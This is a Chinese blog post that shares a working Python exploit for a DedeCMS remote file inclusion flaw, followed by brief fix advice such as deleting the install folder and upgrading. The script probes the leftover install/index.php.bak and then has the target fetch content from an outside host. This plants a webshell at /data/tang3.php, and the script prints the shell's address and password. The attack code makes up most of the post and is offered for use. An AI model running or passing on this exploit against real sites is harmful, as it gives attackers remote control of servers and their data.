织梦CMS是使用最多的CMS之 一,但是漏洞也非常多。分享一款python写的织梦远程文件包含漏洞。修复此漏洞方法,请见文章底部。
织梦CMS漏洞代码
#! /usr/bin/env python
#coding=utf-8
#Joseph(小续)
import requests
import sys
import re
def main():
try:
url="http://"+sys.argv[1].strip('http://')
except IndexError:
print '''
poc: dede.py [url]http://www.baidu.com/[/url]
'''
payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
urlpoc=url+payload
code=requests.get(urlpoc).status_code
if code==200:
print u"恭喜存在此漏洞"
print u"Ongoing attacks--->>>>>"
exploit(url)
pass
else:
print u"sorry 漏洞正在挣扎"
pass
def exploit(url):
urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"
htmlcontent=requests.get(urlpoc).content
Probe=re.compile(r'存在')
if Probe.findall(htmlcontent):
print u'''
ver:getshell成功
shell:url+/data/tang3.php?a=0 密码为:c
'''
pass
else:
print u"请看远程地址是否已经不可用"
pass
if __name__ == '__main__':
main()修复方法
1、建议安装完成后,删除(改名)install文件夹。
2、给data文件夹改名,或者移动位置。
3、到织梦后台,升级到最新的版本
4、官方网站下载最新补丁包手动更新到最新版本。
5、不用谢!
相关专题
- 密码强度检测Python源代码 [2023-06-06]
- 批量转存百度网盘分享资源Python脚本 [2022-09-29]
- Python一键安装卸载工具V1.0 [2022-07-21]
- Python+HTML随机点名抽奖源码模板 [2021-11-01]
- [阿里云盘]python爬虫验证码识别破解教程 [2021-09-19]
